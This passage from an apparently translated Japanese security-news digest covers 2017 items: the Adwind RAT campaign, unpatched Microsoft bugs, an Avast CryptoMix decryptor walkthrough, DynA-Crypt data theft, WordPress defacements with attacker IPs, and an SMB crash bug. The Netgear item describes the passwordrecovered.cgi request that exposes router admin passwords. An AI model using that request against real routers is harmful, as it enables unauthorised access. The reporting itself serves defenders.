     そして、多くのサイトが、NextGEN Galleryの2.1.79にアップデートすることの重要性を認識していない。結局、このプラグインの所有するチェンジログに記述されている緊急のセキュリティ上の脆弱性の修正は、参照されていない。

     あなたは、このフローに関して触れられていることと、修正がリリースされている事実を発見するには、このプラグインのサポートフォーラムを掘り下げる必要がある。
     多くのWordPress稼働型のWebサイトは、サードパーティ製の多くのプラグインを使用している。これは、あなたのコンピュータ上の他のソフトウェア同様に、プラグインのアップデートを維持することと、セキュリティ脆弱性に対する防御が重要であることを意味している。
     プラグインが開発者によって杜撰にコーディングされている場合、常にあなたのWebサイトはセキュリティ侵害されるリスクがあるし、訪問者のコンピュータを危険に晒すことになる。
     有難いことに、今回の場合、この脆弱性は潜在的に問題のあるプラグイン開発者に、責任を持って通知するセキュリティ企業によって発見された。そして、この責任は、このプラグインの最新バージョンをダウンロードし、彼等のサイトにそれを適用するWebサイトの管理者に存在している。
     私はただ、Imagely(NextGEN Galleryの開発者)が、彼等の数百万のユーザに、最新のプラグインアップデートをもっと告げることを希望する。


    100ヶ国以上1500の企業が、悪意あるAdwindバックドアRATで攻撃されている
    Graham Cluley : News (2017/02/28)
     100ヶ国以上1500を超える企業がAdwind Remote Access Tool(RAT、【訳注】 ネズミのように見えないところで活動していることから、広義には遠隔操作を可能にするツール全般を意味するが、狭義にはトロイの木馬型(またはバックドア型)マルウェアを指す(ESET Keyword Encyclopediaより))で感染させられている。
     Kaspersky Labの研究者によって発見された、この新しい攻撃作戦は、Adwind(2013年以来、45万人を超える個人(Mac愛好者を含む)をターゲットにしてきた多機能型バックドア)が、企業を餌食にすることを好きになったことを示唆している。
     Adwindマルウェア(AlienSpy, Frutas, Unrecom, Sockrat, jRATとしても知られる)は、取り分け、流通に魅力を感じているようであり、凡そ1/5が、このカテゴリに該当している。しかし、Adwindは、殆ど選り好みをしない。このマルウェアはまた、建築、輸送、土建、保険、法曹界の組織も食い物にしている。


    ターゲットにされている産業別Top 10

     この攻撃は、企業がHSBC(【訳注】 英国を本拠とする世界最大級のメガバンク)のようなところからeMailを受け取ることで始まる。このeMailは、2013年以来アクティブである mail.hsbcnet.hsbc.com ドメインから出発している。このメッセージには、付属の添付ファイルは受領者用の支払い通知を含んでいると記されている。
     しかし、添付ファイルには、そのようなものは含まれていない。Kasperskyは警告中で以下のように説明している。

     「通知の代わりに、この添付ファイルはマルウェアのサンプルを含んでいる。ターゲットにされたユーザが添付されているZIPファイル(この中にRARファイルが含まれている)を開くと、このマルウェアは、自己インストールし、そのコマンド&コントロール サーバと通信しようとする。このマルウェアは、攻撃者が、セキュリティ侵害されたデバイスの制御をほぼ完全に獲得し、感染したコンピュータから秘密情報を盗むことを可能にする。」

     (誤解のないように言うと、このZIPファイルそれ自体を開いても何ら傷つけられることはないが、このZIPアーカイブに含まれるJARファイルを開くと、コンピュータは感染する。)
     接続が確立すると、攻撃者は、感染したコンピュータから極秘情報を盗むためにAdwindを使用する。これは、ビジネスに関連する重要な情報を含んでいる。


    ターゲットにされている国別Top 10

     これまでは、マレーシアを本拠とする団体が、この攻撃の矛先で傷つけられた。しかし、英国、ドイツ、レバノン、その他の国々も遅れをとっていない
     Adwindの進化(並びに、地下の市場や他の暗黒Webフォーラムでの商業的入手性)した場合には、団体は彼等のJavaの使用を、そのソフトウェアが適切に機能するために絶対に必要とされる僅かなアプリケーションに制限しなければならない。
     可能なら、各企業は、セキュリティを更に一歩進め、彼等の他のエンドポイントから、これらのアプリケーションを分離しなさい。


    Googleが、Microsoft EdgeとIEの未パッチの脆弱性を公開した
    BleepingComputer : News>Security (2017/02/24)
     Googleが、先週Windows GDIコンポーネント中のバグの詳細を公開した後、Microsoftの製品中の第二の未パッチの脆弱性に関する詳細を公開した。今回は、EdgeとInternet Explorerに関するものである。
     記述している時点で、「一部の顧客が影響を受ける差し迫った問題」を引用し、Microsoftが、2月の定例のパッチをキャンセルしたので、このバグは未パッチのまま残されている。

    EdgeとIEに影響を与えるType Confusion問題

     GoogleのProject Zeroの研究者Ivan Fratricによって発見されたこのバグは、CVE-2017-0037識別子によって追跡される。この問題は、攻撃者が影響を受けているマシンでコードを実行したり、デバイスを乗っ取ることを可能にする種類のセキュリティフローであるType Confusion(【訳注】 データ型を誤って処理することで発生する問題)である。
     CVE-2017-0037に関する詳細は、Proof-of-Concept(実証実験、PoC)コードが付属するGoogleのバグレポートで利用可能である。PoCコードは、この脆弱性の残っているブラウザをクラッシュさせるが、攻撃者の能力水準に応じて、より危険な悪用が構築されるだろう。
     Fratricは、このバグを昨年の11月末に発見し、Googleが問題を解消すべき企業に対して与えている90日間の猶予期限が切れた本日公開した。

    2月の定例パッチのキャンセルと、その因果関係

     Microsoftが今月の定例のアップデートで、このバグへのパッチを予定していたか否かは不明である。
     EdgeとIEのバグに加えて、Microsoft製品は、他の二つの緊急のセキュリティフローを塞がれなければならない。一つは、Windows GDIコンポーネントのフローであり、他の一つは、全てのWindows OSのバジョンに同梱されているSMBファイル共有プロトコルである。
     良いニュースは、これらのフローは未パッチのままであるが、0-Dayではない。これらの問題のどれかを攻撃者が使用したという事件は、未だレポートされていない。
     Microsoftは先週、3月の定例パッチ(3月15日に予定されている)で、2月の定例パッチもリリースする予定であると発言している。
     その一方で、Microsoftは、Windows 10に含まれるAdobe Flash Playerをアップデートした今週、幾つかのセキュリティアップデートを出荷している。


    Avastが、CryptoMix身代金要求型マルウェアの復号プログラム(オフライン バージョン)をリリースした
    BleepingComputer : News>Security (2017/02/23)
     本日、Avastが、オフラインモードの間に暗号化されたCryptoMixの犠牲者のために復号プログラムをリリースした。オフラインモードは、インターネットに接続していない、あるいは、そのコンピュータが、この身代金要求型マルウェアのコマンド&コントロール サーバに接続できていない間に、この身代金要求型マルウェアが稼働し犠牲者のコンピュータを暗号化するものである。
     CryptoMixがオフラインモードでファイルを暗号化する時、研究者が再現することのできる暗号化キーを使用する。これらのキーは、犠牲者のファイルを試し、復号するために使用することができる。そして、これらのキーの一つが動作した場合、これは、犠牲者がオフラインモードで暗号化されており、このキーがコンピュータ全体を復号するために使用できることを意味している。
     現在、この復号プログラムは、.CRYPTOSHIELD, .scl, .rscl, .lesli, .rdmk, .code, .rmd ファイルを復号するために使用することができる。憶えておかなければならないことは、暗号化されたファイルが、これらの拡張子の一つを含んでいたとしても、オフライン モードで暗号化されたか否か不明なので、復号されるという保証はないということである。
     それでも、私は、CryptoMixに感染した全ての犠牲者は、必ずこの復号プログラムを試すように提案する。疑問や、この復号プログラムの操作に支援を必要とする人は、我々の CryptoMix Help & Support Topic で気楽に質問しなさい。

    Avastの復号プログラムを使用して、オフラインで暗号化されたCryptoMixファイルを復号する方法

     オフラインCryptoMix暗号化で暗号化されたファイルを復号するには、ユーザは暗号化されたファイルと、それと同一の暗号化されていないファイルの両方のバージョンを持っていなければならない。暗号化されたファイルと一致する暗号化されていないファイルを見つけるには、 C:\Users\Public\Pictures\Sample Pictures のサンプル ピクチャ フォルダを使用するように提案する。このフォルダの画像は、大抵は暗号化されるが、その暗号化されていないバージョンは、簡単に他のコンピュータからダウンロードすることができる。
     これを実行するには、http://rumkin.com/tools/cipher/rot13.php に進み、暗号化されたファイルのファイル名を入力しなさい(但し、.CRYPTOSHIELD拡張子は外す)。例えば、暗号化されたファイルが、 CRATHVAF.WCT.CRYPTOSHIELD と名付けられているのであれば、 そのWebサイトでは、CRATHVAF.WCT とだけ入力しなさい。ファイル名を入力したら、このWebサイトは自動的に、そのファイルを復号するので、あなたは、以下に示したようにオリジナルのファイル名を確認できる。


    ファイル名を復号中のROT-13D(画像はクリックすると拡大します)
    (【訳注】 ブラウザがJavaScript 1.2をサポートしていない場合は、最新のバージョンを取得しなければならない)

     上の画像で見られるように、この復号されたファイル名はPenguins.jpgである。これで、我々は、暗号化されたファイルのオリジナルのファイル名を認識したので、他のコンピュータから暗号化されていないバージョンを、Decryptフォルダ(【訳注】 このフォルダは、デスクトップに先に作成しておく)中にコピーすることができる。
     Decryptフォルダに、暗号化されたファイルと暗号化されていないファイルの両方が揃ったので、このフォルダは、以下の画像のようになっているはずである。


    Decryptフォルダ

     我々はファイルのペアを持ったので、復号プロセスを開始することができる。Avast WebサイトからCryptoMix復号プログラムをダウンロードするには、以下のリンクを使用し、デスクトップに保存する。

    Avast CryptoMix復号プログラム(直リンク)

     ファイルをダウンロードしたら、ダブルクリックして、avast_decryptor_cryptomix.exe を実行する。このプログラムが起動すると、以下に示す、この復号プログラムのメイン画面が表示される。


    CryptoMix復号プログラム

     ここでは、Next> ボタンをクリックする。これで、復号したいドライブの選択を要求する画面が表示される。 以下に示す画面で、あなたが復号したい各ドライブやフォルダを追加しなさい。


    復号場所の選択

     復号したい場所の全てを選択したら、Next> ボタンをクリックする。これで、暗号化されたファイルと暗号化されていないファイルのペアを選択するように要請される。我々は、このペアのファイルをデスクトップのDecryptフォルダに置いてある。


    暗号化されたファイルと暗号化されていないファイルのペアを追加する

     上の画像の各フィールドで、フィールドの右にある … の付いた矩形のボタンをクリックし、デスクトップのDecryptフォルダから適切なファイルを選択する。我々が暗号化されたファイルと、それと同一の暗号化されていないファイルを選択したら、Next> ボタンをクリックする。これで、以下に示すファイルのキーの検索を要請する画面が表示される。


    パスワードをクラックする画面

     準備が整ったので、Startボタンをクリックする。復号プログラムは、多くの既知の復号キーであなたのファイルをチェックする。復号キーが発見されると、以下類似の画面が表示される。


    CryptoMix復号パスワードが発見された

     ここで、Next> ボタンをクリックすると、あなたが選択できる幾つかの復号オプションの付いた画面が表示される。


    復号オプション

     上の画像に示してあるように、二つのオプションの両方を有効にするように提案する。あなたが、どのオプションを有効にするのか決定したら、CryptoMixで暗号化されたファイルの復号を開始するために、Decryptボタンをクリックしなさい。この復号プロセスには、かなり時間が掛かる。我慢しなさい。


    CryptoMixで暗号化されたファイルを復号中

     復号が終了すると、以下のような画像が表示される。


    復号終了

     これで復号は完了したので、この復号プログラムを終了しなさい。
     この復号プログラムが、あなたのファイルを復号できなかったなら、暗号化される時点で、あなたのコンピュータがオフラインでなかったことを意味している。あるいは、まだ復元できない特別なキーで暗号化されたことを意味している。おそらく、キーは将来発見されるだろう。

    復号できる暗号化されたオフライン ファイル拡張子

    .CRYPTOSHIELD
    .scl
    .rscl
    .lesli
    .rdmk
    .code
    .rmd


    Microsoftが定例のパッチを遅延した後、GoogleがWindowsのバグを公開した
    BleepingComputer : News>Security (2017/02/18)
     三ヶ月間で二度目、Googleの技術者は、Microsoftが修正をリリースしていないWindows OS中のバグを公開した。その後、Googleがアナウンスした。
     問題のバグは、Windows GDI(Graphics Device Interface、gdi32.dll)に影響を与える。これは、ビデオ ディスプレイとローカル プリンタの両方でグラフィックスとフォーマットされたテキストをアプリケーションが使用するのを可能にするライブラリである。

    このバグは、2016年06月不完全に修正されていた

     GoogleのProject Zeroチームのバグ レポートによれば、このバグは当初、2016年06月に発見された問題の大規模なコレクションの一部であった。そして、2016年07月に、Microsoftのセキュリティ ブレティンMS-16-074で修正された。
     Mateusz Jurczyk(最初にこのバグを見つけたGoogleのエンジニア)は、MS16-074のパッチは不満足なものであり、問題の一部は脆弱性のあるままにされていたと発言している。
     継続されたテストに基づき、この研究者は11月に、彼のバグレポートを再提出した。Microsoftは、90日間(Googleがベンダにバグの修正を許容している期間であり、これを過ぎるとバグは公開される)でバグの修正をすることができなかった。

    これは初めてのことではない

     Googleが、Microsoftにこのステップを採ったのは2016年11月(Microsoftが11月のパッチをリリースする数日前にATP28(Strontium、ストロンチウム)として知られるサイバースパイ集団によって悪用された0-Day攻撃に関する詳細の公開)以来二回目である。
     その時、Googleは、Microsoftがパッチを公開するまでユーザが自身を保護できるように、このステップを採ったと発言していた。
     MicrosoftのTerry Myerson(Windows and Device Group部長)は、Googleと同じ立場でこのバグを見ようとせず、Googleが顧客に大きなリスクを負わせたことに「失望した」と発言していた。

    Microsoftがパッチを遅延させたために、このバグは今月修正されない

     Myersonは、またしても同じスタンスに立つことができなかった。そのために、Googleは、02月14日(Microsoftがパッチをリリースするパッチの水曜日同日)に、この最新の未パッチのバグを公開した。
     Microsoftは、「一部の顧客が影響を受ける差し迫った問題」を引用し、今月のセキュリティ アップデートを来月まで先延ばしにした
     Googleの決定は、Microsoftの腹づもりに対する直接的な答えであるだけでなく、今月の全てのセキュリティアップデートを止めた。今月予定されていたパッチは、ひょっとして、Microsoftのエンジニアが「差し迫った問題」で躓かなかったなら、受け取っていたかもしれない。

    このバグはIEとOfficeオンラインのユーザに影響を与える

     GoogleのJurczykによると、Microsoftがパッチしていないこの問題(CVE-2017-0038として追跡される)は、攻撃者が悪意あるEMFファイルを使用してユーザのメモリの内容を読むことを可能にする。悪いニュースは、EMFファイルは他のドキュメント中に隠すことができるということである。
     「私は、Internet Explorerでローカルに、Office Onlineでリモートに、特別に細工したEMFファイルを含む .docx ドキュメントを介して、この脆弱性が再現することを確認した」と、Jurczykは説明している。
     攻撃のこれらのタイプの重大性は、悪意あるEMFファイルがメモリ中で実行する場所に依存し、どのようなデータタイプが、そのバイトの近くに存在しているかに依存する。

    緩和策は存在しない

     Googleのセキュリティ エキスパートは、このセキュリティ バグを悪用した攻撃に対する如何なる緩和策も提供していない。
     Windowsユーザは、Microsoftが02月と03月の両方のパッチを配布することを計画している03月15日まで、攻撃に対する脆弱性を残したまま放置されるだろう。
     Jurczykが未パッチのWindows GDIフローを公開した日に、Google Project Zeroチームの他のメンバーは、Microsoftが、過去にWindows NVIDIAドライバにパッチした16のセキュリティフローの詳細を公開した。これらの問題は、今回のJurczykの発見とは関連していない。


    DynA-Cryptはファイルを暗号化するだけでなく、あなたの情報も盗む
    BleepingComputer : News>Security (2017/02/07)
    【訳者より】 DynA-Crypt感染は復号可能ですが、復号方法は記述されていません。末尾に記しておきますが、BleepingComputerに登録し、この記事へコメントすることで復号方法を提供するとされています。

     DynA-Cryptと呼ばれる新しい身代金要求型マルウェアが、GDataマルウェア解析アナリストKarsten Hahnによって発見された。この身代金要求型マルウェアは、犠牲者のデータを暗号化するだけでなく、犠牲者のコンピュータから山のような情報も盗む。身代金要求型マルウェアと情報を盗む感染は、ありがちなものであるが、DynA-Cryptのように、この二つをグチャグチャに結合すると、犠牲者のプログラムとデータを台無しにする山のような **** 蒸気を立ち上らせたままにする。
     この問題は、この身代金要求型マルウェアが、多数のスタンドアロンの実行ファイルと、それらが実行するアクションの一部で意味をなさないPowerShellスクリプトで構成されていることにある。このマルウェアは、犠牲者のパスワードと連絡先を盗んでいる間にファイルを暗号化するだけでなく、犠牲者のファイルを何処にもバックアップせずに削除する。

    DynA-Cryptは、犠牲者のデータを削除している間に山のような情報を盗む

     PCriskによると、このプログラムは、誰もが独自のマルウェアを作成して犯罪者になることを可能にするマルウェア作成キットによって作成されている。これは、誰もが動作するマルウェアを簡単に作成できることを意味しているが、実行していることの意味を知らない人々も同様に、動作するマルウェアを作成できることを意味している。DynA-Cryptは、このケースのように思われる。
     次のセクションで説明するように、DynA-Cryptの一部分である身代金要求型マルウェアに関しては悩みの種であるが、現実の問題は、このプログラムがコンピュータから盗むデータと情報量にある。稼働している間、DynA-Cryptは、犠牲者のアクティブデスクトップのスクリーンショットを取得し、コンピュータのシステムサウンドを録音し、犠牲者がキーボードでタイプしたコマンドをログし、多数のインストールされているプログラムからデータを盗む。
     DynA-Cryptが盗むプログラムとデータは以下を含む:

      ・ Screenshots
      ・ Skype
      ・ Steam
      ・ Chrome
      ・ Thunderbird
      ・ Minecraft
      ・ TeamSpeak
      ・ Firefox
      ・ システムオーディオの録音

     このデータが盗まれている時、このマルウェアは、%LocalAppData%\dyna\loot\ と名付けられたフォルダに、盗んだデータをコピーし、開発者に送信する準備ができると、%LocalAppData%\loot.zip と名付けられたファイルに、その全てをZIPで圧縮し、以下に示したように、そのZIPファイルを開発者にeMailする。

    問題は、このマルウェアが犠牲者のデータを盗んだ後、明確な理由もなく盗んだ多くのフォルダを削除するということにある。

     犠牲者のデータを盗むことと、それに関して侮辱することとは別物である。開発者がファイルを削除しても絶対に得るものはない。彼等は得ようとしたものを既に得ている、そして、私は犠牲者を馬鹿にしたところで便益はないと確信している。更に悪いことは、このマルウェアは、デスクトップにあるものを全部削除する。そこから何かを盗むわけでもなく。

    DynA-Cryptの身代金要求型マルウェア部分は、復号できる

     DynA-Crypt身代金要求型マルウェアは、犠牲者のデータを暗号化するためのAESと呼ばれるスタンドアロン プログラムを使用するPowerShellスクリプトによって稼働されている。このスクリプトは、以下の拡張子に一致するファイルに関してコンピュータを検索し、一致したファイルを暗号化する。

      .jpg, .jpeg, .docx, .doc, .xlsx, .xls, .ppt, .pdf, .mp4, .mp3, .mov, .mkv, .png,
      .pst, .odt, .avi, .pptx, .msg, .rar, .mdb, .zip, .m4a, .csv, .001

     このマルウェアは、ファイルを暗号化すると、暗号化したファイル名に .crypt 拡張子を追加する。これは、test.jpg というファイルが暗号化されると test.jpg.crypt にリネームされることを意味している。この身代金要求型マルウェアは、犠牲者のコンピュータのシャドー ボリューム コピーも削除するので、これを使用してファイルを復元するのは不可能である。
     コンピュータの暗号化が終了すると、DynA-Cryptは、囲まれているBitcoinアドレスに $50 USD分をBitcoinで支払うように要求するロック画面を表示する。幸いなことに、現時点まで、誰も身代金を支払っていない。


    DynA-Crypt身代金要求型マルウェア

     良いニュースは、DynA-Cryptの身代金要求型マルウェア部分は、簡単に復号することができるので、このプログラムに感染しても身代金を支払う必要は全く無い。あなたが、この身代金要求型マルウェアに関して支援を必要とするのであるのなら、此処にコメントを残しなさい。復号プログラムが提供されるだろう。

    【訳者より】
    この復号プログラムを取得するには

    1/ 以下のサイトにアクセスする。
    https://www.bleepingcomputer.com/news/security/dyna-crypt-not-only-encrypts-your-files-but-also-steals-your-info/

    2/ 記事本文の下にある Post a Commentにある Register Now をクリックしてユーザ登録を行う。

    3/ 再び、このサイトに戻り、Register Now の上にある Login ボタンを押しログインする。

    4/ 必ず英文でコメントする。

      5/ 以下、BleepingComputer担当者の指示に従う。

     

    67000を超えるWebサイトが最近パッチされたWordPressのバグで改変されている
    BleepingComputer : News>Security (2017/02/07)
     先週リリースされた一番最近のバージョン v4.7.2にアップデートしていないWordPressサイトは、四つのハッキンググループが実行している巨大な改変作戦の下にある。
     詳細な脆弱性がこの前の月曜日に公開された後に、この攻撃を検出したWebセキュリティ企業Sucuriによると、この攻撃は、ゆっくりと拡大しており、一日あたり約3000のサイトが改変されている。


    時系列での、REST APIフローを介した改変の試み

     攻撃者はWordPressのREST API中の脆弱性(WordPressチームがほぼ二週間前に修正したが、彼等は、この月曜日に詳細を公開した)を悪用している。
     この脆弱性は、遠隔の攻撃者が、REST APIエンドポイントへの接続を確認するHTTPリクエストを細工し、ユーザのWebサイトのタイトルやコンテンツを改造するすることを可能にするものである。
     Securiによると、このフローが悪用されていることは自明であり、先週からオンラインに幾つかの悪用が公開されている。

    67000を超えるWebサイトが既に改変された

     この脆弱性はWordPress 4.7.0と4.7.1に影響を与えるだけであり、このCMSがセキュリティ問題に関して自動アップデートの機能を組み込んでいるにも拘わらず、多くのWebサイトでアップデートされていない。
     Sucuriのhoneypotテストサーバから収集されたデータに基づくと、このフローを悪用しようとしている四つの攻撃者グループが先週活動していた。

    グループ名 IP 見積もられる犠牲者数
    w4l3XzY3 176.9.36.102
    185.116.213.71
    134.213.54.163
    2a00:1a48:7808:104:9b57:dda6:eb3c:61e1 (IPv6 address)
    66000
    Cyb3r-Shia 37.237.192.22 500
    By+NeT.Defacer 144.217.81.160 500
    By+Hawleri_hacker 144.217.81.160 500

     この攻撃は数日間続いたので、Googleは、これら改変されたサイトの一部をインデックスすることを始めてしまっていた。


    Googleによってインデックスされた改変されたWebサイト

     現在、Webサイトを改変するためにREST APIを使用しているグループは、彼等のブランドを人目に晒すためだけに実行している(彼等の名前を追加することによってページタイトルと彼等のコンテンツに変更しているだけ)。


    改変されたサイトの一つ

     SucuriのCTO,Daniel Cidは、リンクや画像のようなより複雑なコンテンツを投稿するために脆弱性を利用したSEO(検索エンジン最適化)スパムグループのような専門的な改変者が囲いの中に入るのを見るだろうと予測している
     この種類の改変は、他のサイトのSEOランキングを上げるためや、いかがわしい製品の販売促進に使用される。SEOターゲット改変を被ったWebサイトは、影響を受けたことを示すSERP(検索エンジン結果ページ)を持つことになり、検索エンジンでの彼等の評価を落とすリスク(彼らのサイトへのトラフィックを減少させる)を有することになる。
     Webサイトの所有者は、REST APIに起因してGoogleで表示されなくなることを回避するために、可能な限り早急にWordPress 4.7.2にアップデートするようアドバイスされている。


    新たなSMBバグ: Link of Death(死のリンク)でWindowsシステムはクラッシュする
    The Register : Security (2017/02/04)
     【訳注】 SMB: Server Message Block。ネットワークを通じてコンピュータ間でファイルやプリンタ、シリアルポートなどを共有するためのプロトコルのこと(IT用語辞典より)。

     火曜日、US CERTは現在サポートされているWindowsの全てのバージョンに、遠隔からコンピュータをクラッシュさせるために悪用することができるメモリ損壊のバグに対する脆弱性があると警告するセキュリティ アドバイザリをリリースした。
     「Windowsは、SMB2 TREE_CONNECT応答構造体で定義される構造に従い、大変多くのバイトを含む特別に細工されたサーバの応答を適切に操作することに失敗する」、続けて「悪意あるSMBサーバに接続することによって、脆弱性のあるWindowsクライアント システムは、mrxsmb20.sys中でクラッシュ(BSOD)する」と、US CERTは発言している。
     この脆弱性は当初、共通脆弱性評価システムで10に評価されていたが、7.8にダウングレードされた。この脆弱性を悪用するには、攻撃者はWindowsシステムを悪意あるSMB共有に接続する必要がある。
     例えば、これは、犠牲者を欺き、OutlookでeMailにシェアされている悪意あるリンクをクリックするこで実行される。もしくは、邪悪なファイルサーバへのソースURLを付けた不可視画像をWebページに埋め込み、Internet Explorerを使用して、そのサイトを訪問するようにすることで実行される。この結果は、不幸なユーザに何処からともなくBSODシステム クラッシュを引き起こすことになる。
     セキュリティ研究者Laurent Gaffie(eにウムラウト)がThe Registerに告げたところによると、このバグはNULLポインタ デリファレンスに関係している。彼とMicrosoftは共に、この問題が、遠隔からのdenial of service(DoS)攻撃を導くことを潜在的に意味しているが、遠隔からのコード実行は意味していないと考えている。
     このバグは、ローカル(NetbiosやLLMNR被毒を介して)もしくは、UNCリンクを介して遠隔からの何れかでターゲットを再起動するために使用される。
    「この明白なバグは、即座にSDLCプロセスによって捕獲されなければならなかったが、驚くことに捕獲されなかったことに注意することは重要である。」 続けて、「これは、新しいコードベースが、Microsoftの最新のオペレーティングシステムを出荷する前に、単純に検証されていないことを意味している」と、Gaffieは発言している。
     Gaffieは、このバグを2016年11月25日にMicrosftに提示し、Microsoftは、12月の定例パッチで用意が整っていた、と発言している。
     Microsoftは、2月まで、この修正を遅らせた。これは、12月に一つ修正するより、一度に幾つものSMB修正をリリースしたほうが、彼等にとっては理にかなっているためであると、彼は説明している。
     他のセキュリティ研究者も、このバグを見つけたので、Gaffieはパッチがリリースされる一週間前に、このバグを公開することを決定したと、彼は発言している。これは、彼が無償でMicrosoftを支援する作業を実行しているにも拘わらず、Microsoftが、彼が通知した脆弱性を抑えつけておくのは、これが初めてのことではないからである。
     「Microsoftが、このようなバグを伏せている間、Microsoftは、彼等のユーザに、マーケティング ダメージ コントロールを実行することを除いて何の支援もしていない」、続けて、「この態度は、彼等のユーザに対して間違っているものであり、セキュリティ コミュニティのためには更に悪い」と、発言している。
     GaffieはGitHubを介して、脆弱性の概念実証をリリースしている。


    多くのNetgearルータにパスワードを盗まれるセキュリティホールが発見された
    ESET : We Live Security (2017/01/31)
     或るセキュリティ研究者は、何十ものNetgearルータ中に深刻なセキュリティ ホール(「百万台を超えるとは言わないまでも、数十万台」のデバイスが、ハッカーによって管理者パスワードを盗まれるリスクがあることを意味する)を発見した方法を説明している。
     Trustwaveの研究者Simon Keninは、寒き雨の冬に真の怠惰が、ルータを再起動するためにベッドから出て、階下に行くことを、如何にして彼を押し留めたのかを説明している。代わりに、彼はベッドの中にいて、アクセスパスワードを忘れた時に、そのデバイスのWeb管理者パネルに侵入する方法があるか否かを調査した。
     恐ろしいことに、Keninは、彼が実行する必要のあった唯一のことは、その管理者パスワードを取得するために、2014年に他のNetgearルータで発見された二つのセキュリティ フローを使用して、ルータ マネージメント ソフトウェアに簡単なWebリクエストを送信することであったことを発見した。

     Webパネルにアクセスすることを試みると、ユーザは、認証を求められる。この認証をキャンセルすると、パスワードの復元は許可されない。ユーザはパスワード復旧トークンを露出するページにリダイレクトされる。ユーザが、このページ http://router/passwordrecovered.cgi?id=TOKEN(そして、パスワードの復元は許可されない)に正しいトークンを提供すると、彼等はルータ用の管理者パスワードを受け取る。

     明らかになったことによると、このルータの管理者パスワードは、攻撃者が正当なパスワード復旧トークンを送信しない場合でさえ取得することができる。 

     あなたがどのようなパラメータを送っても、passwordrecovered.cgiへの第一のコールは、証明書を渡すことであることを、私は発見した。これは、私が他の如何なる場所でも見たことのない完全に新しいバグである。私は、異なるNetgearのモデルで、この二つのバグをテストした時、私の二つ目のバグは、大変幅広いモデルで動作することを発見した。

     Keninは、同じWi-Fiネットワーク上にいるのに、このルータが、このフローに弱いことを公表したことは拙いことだが、彼が決定したことは、このルータのリモート マネージメント用のオプションが許可されていた場合、この脆弱性は悪意ある攻撃者によって遠隔から悪用されることが可能であるということである。
     幸いなことに、このリモート マネージメント機能はNetgearのルータではDefaultで無効にされているので、悪意あるハッカーが、このフローを悪用しようとするチャンスには、多少の障害がある。しかし、Keninによると、百万とは言わないまでも数十万のデバイスは、公衆インターネットを介してアクセス可能であるので、悪用の最大の危険を考慮すべきである、としている。
     サポート アドバイザリで、Netgearは、ユーザが、彼等のルータのファームウェアを完全にアップデートしていることを確認するように推奨している。
     以下のファームウェアがパッチされていない場合、多数のNetgearルータは、彼が明らかにしたセキュリティホールに対して脆弱であると、Keninは主張している。

    AC1450 V1.0.0.34_10.0.16 (最新版)
    AC1450 V1.0.0.22_1.0.10
    AC1450 V1.0.0.14_1.0.6
    D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52以降は影響を受けない)
    D6400 V1.0.0.34_1.3.34
    D6400 V1.0.0.38_1.1.38
    D6400 V1.0.0.22_1.0.22
    DC112A V1.0.0.30_1.0.60 (最新版)
    DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66が最新で、影響を受けない)
    JNDR3000 V1.0.0.18_1.0.16 (最新版)
    R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41以降は影響を受けない)
    R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10が最新で、影響を受けない)
    R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10が最新で、影響を受けない)
    R6300 V1.0.2.78_1.0.58 (最新版)
    R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76が最新で、パッチされている)
    R6300v2 V1.0.3.30_10.0.73
    R6700 V1.0.1.14_10.0.29 (最新版だがベータ)
    R6700 V1.0.0.26_10.0.26 (最新版、且つ、安定版)
    R6700 V1.0.0.24_10.0.18
    R6900 V1.0.0.4_1.0.10 (最新版)
    R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93が最新で、パッチされている)
    R8300 V1.0.2.48_1.0.52
    R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62以降はパッチされている)
    R8500 V1.0.2.26_1.0.41
    R8500 V1.0.0.56_1.0.28
    R8500 V1.0.0.20_1.0.11
    VEGN2610 V1.0.0.35_1.0.35 (最新版)
    VEGN2610 V1.0.0.29_1.0.29
    VEGN2610 V1.0.0.27_1.0.27
    WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81が最新で、影響を受けない)
    WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51が最新で、影響を受けない)
    WNDR3700v3 V1.0.0.38_1.0.31 (最新版)
    WNDR4000 V1.0.2.4_9.1.86 (最新版)
    WNDR4500 V1.0.1.40_1.0.68 (最新版)
    WNDR4500v2 V1.0.0.60_1.0.38 (最新版)
    WNDR4500v2 V1.0.0.42_1.0.25
    WGR614v10 V1.0.2.60_60.0.85NA (最新版)
    WGR614v10 V1.0.2.58_60.0.84NA
    WGR614v10 V1.0.2.54_60.0.82NA
    WN3100RP V1.0.0.14_1.0.19 (最新版)
    WN3100RP V1.0.0.6_1.0.12
    Lenovo R3220 V1.0.0.16_1.0.16 (最新版)
    Lenovo R3220 V1.0.0.13_1.0.13

     先月、我々は、Netgearルータを遠隔から悪用できる様々な方法を、CERTが警告していることをレポートした。
     Keninは、Netgearが、この問題を深刻に受け止めていると信じている。彼は昨年責任を持って、この脆弱性を公開している。そして、Netgearは、「積極的なスケジュールで、現在未パッチのモデルのファームウェアをリリースすることに専念している」とレポートしている。
     更に、Netgearは、Bugcrowdバグ報奨金サービス(脆弱性研究者が、その会社のセキュリティ チームとより簡単に情報交換し、彼等が発見し、責任を持って公開したフローの詳細に関して報奨を得るためのメカニズムを提供するもの)に参加していた。
     結果は、「より安全な製品系列とサービス」でなければならないと、Keninは発言している。
    Netgearはともかく、真実は、全てのルータメーカーが、本当に彼等のデバイスを安全にするより良い仕事を実行し始める必要があるということである。結局、ますます安全性の低いデバイスがインターネットに接続されているので、我々全てにとって、インターネットは安全性の低い場所となっている。

    VirLockerは、以前より悪性になって回帰している。復号可能
    BleepingComputer : News>Security (2017/01/18)
     VirLocker身代金要求型マルウェアが、ここ数週間、新しくなり、そして、大変悪性になって回帰している。しかし、Malwarebytesのセキュリティチームは、犠牲者が支払いフィールド中に特定のコードを入力することによって、ファイルを復元することができる方法があると発言している。
     VirLocker(VirLockVirRansomとしても知られる)は、2014年に最初にBleeping Computerによって発見され、当初、Operation Global Ⅲとして参照された身代金要求型マルウェア ファミリーである。
